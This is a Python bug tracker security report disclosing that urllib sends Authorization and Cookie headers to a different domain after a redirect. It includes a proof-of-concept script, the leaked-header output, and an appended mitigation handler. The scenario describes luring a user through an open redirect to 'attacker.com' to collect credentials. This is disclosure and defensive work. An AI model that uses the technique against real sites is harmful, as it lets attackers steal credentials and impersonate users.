New submission from Artem Smotrakov <artem.smotra...@gmail.com>:

After discussing this issue on secur...@python.org, it was decided to disclose it publicly. Here is the original report:
Hello Python Security Team,

It looks like urllib may leak sensitive HTTP headers to third parties when handling redirects.

Let's consider the following environment:

- http://httpleak.gypsyengineer.com/index.php asks a user to authenticate via the basic HTTP authentication scheme
- http://httpleak.gypsyengineer.com/redirect.php?url=<url> is an open redirect which returns a 301 code and redirects a client to the specified URL
- http://headers.gypsyengineer.com just prints out all HTTP headers which a web browser sent

Let's then consider the following scenario:

- create an instance of urllib.request.Request to open 'http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com'
- call the urllib.request.Request.add_header() method to set the Authorization and Cookie headers
- call the urllib.request.urlopen() function to open a connection

Here is what happens next:

- urllib sends the HTTP authentication header to httpleak.gypsyengineer.com as expected
- redirect.php returns a 301 code which redirects to headers.gypsyengineer.com (note that httpleak.gypsyengineer.com and headers.gypsyengineer.com are different domains)
- urllib processes the 301 code and makes a request to http://headers.gypsyengineer.com

The problem is that urllib sends the Authorization and Cookie headers to http://headers.gypsyengineer.com as well.

Let's imagine that a user is authenticated on a web site via one of the HTTP authentication schemes (basic, digest, NTLM, SPNEGO/Kerberos), and the web site has an open redirect like http://httpleak.gypsyengineer.com/redirect.php. If an attacker can trick the user into opening http://httpleak.gypsyengineer.com/redirect.php?url=http://attacker.com, then urllib is going to send the sensitive headers to http://attacker.com, where the attacker can gather them. As a result, the attacker can impersonate the user on the original web site.
Here is a simple POC which shows the problem:

    import urllib.request

    # The open redirect on httpleak sends the client on to headers.gypsyengineer.com
    req = urllib.request.Request('http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com')

    # These headers are meant for httpleak.gypsyengineer.com only
    req.add_header('Authorization', 'Basic YWRtaW46dGVzdA==')
    req.add_header('Cookie', 'This is only for httpleak.gypsyengineer.com')

    # urlopen() follows the 301 redirect automatically
    with urllib.request.urlopen(req) as f:
        print(f.read(2048).decode("utf-8"))

Running this code results in loading http://headers.gypsyengineer.com, which prints out the Authorization and Cookie headers that are supposed to be sent only to httpleak.gypsyengineer.com:

    Hello, I am <b>headers.gypsyengineer.com</b></br></br>
    Here are HTTP headers you just sent me:</br></br>
    Accept-Encoding: identity</br>
    User-Agent: Python-urllib/3.8</br>
    <b>Authorization: Basic YWRtaW46dGVzdA==</br></b>
    <b>Cookie: This is only for httpleak.gypsyengineer.com</br></b>
    Host: headers.gypsyengineer.com</br>
    Cache-Control: max-age=259200</br>
    Connection: keep-alive</br>

I could reproduce it with 3.5.2 and the latest build of https://github.com/python/cpython

If I am not missing something, it would be better if urllib filtered out sensitive HTTP headers while handling redirects.

Please let me know if I wrote anything dumb and stupid, or if you have any questions :)

Thanks!

Artem

----------
components: Library (Lib)
messages: 317793
nosy: alex, artem.smotrakov
priority: normal
severity: normal
status: open
title: urllib may leak sensitive HTTP headers to a third-party web site
type: security
versions: Python 3.5

_______________________________________
Python tracker <rep...@bugs.python.org>
<https://bugs.python.org/issue33661>
_______________________________________
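
As a caller-side illustration of the suggestion in the report (filtering sensitive headers while handling redirects), here is a minimal sketch, not a proposed patch for urllib. The class name StripSensitiveHeadersOnRedirect and the SENSITIVE_HEADERS set are hypothetical names made up for this example, and the choice of which headers count as sensitive, as well as the scheme/host/port comparison, are assumptions. It relies only on urllib.request.HTTPRedirectHandler.redirect_request(), Request.remove_header() and urllib.request.build_opener().

```python
import urllib.request
from urllib.parse import urlsplit

# Assumption: the set of "sensitive" headers is a judgment call for this sketch.
SENSITIVE_HEADERS = {"authorization", "cookie", "proxy-authorization"}


class StripSensitiveHeadersOnRedirect(urllib.request.HTTPRedirectHandler):
    """Hypothetical handler: drop sensitive headers when a redirect
    leads to a different scheme, host or port."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        # Let the stock handler build the follow-up request first.
        new_req = super().redirect_request(req, fp, code, msg, headers, newurl)
        if new_req is None:
            return None

        old, new = urlsplit(req.full_url), urlsplit(newurl)
        # Conservative comparison: an explicit ":80" versus no port at all
        # is treated as a change, so the headers are stripped in that case too.
        if (old.scheme, old.hostname, old.port) != (new.scheme, new.hostname, new.port):
            for name in list(new_req.headers):
                if name.lower() in SENSITIVE_HEADERS:
                    new_req.remove_header(name)
        return new_req


# build_opener() uses this handler in place of the default HTTPRedirectHandler.
opener = urllib.request.build_opener(StripSensitiveHeadersOnRedirect())

req = urllib.request.Request(
    'http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com')
req.add_header('Authorization', 'Basic YWRtaW46dGVzdA==')
req.add_header('Cookie', 'This is only for httpleak.gypsyengineer.com')

# opener.open(req) would follow the redirect with the filtered headers;
# the call is left out here so that the sketch makes no network requests.
```

With such an opener, the Authorization and Cookie headers should still reach httpleak.gypsyengineer.com on the first request, while the redirected request to a different host is built without them. Redirects that stay on the same scheme, host and port keep the headers.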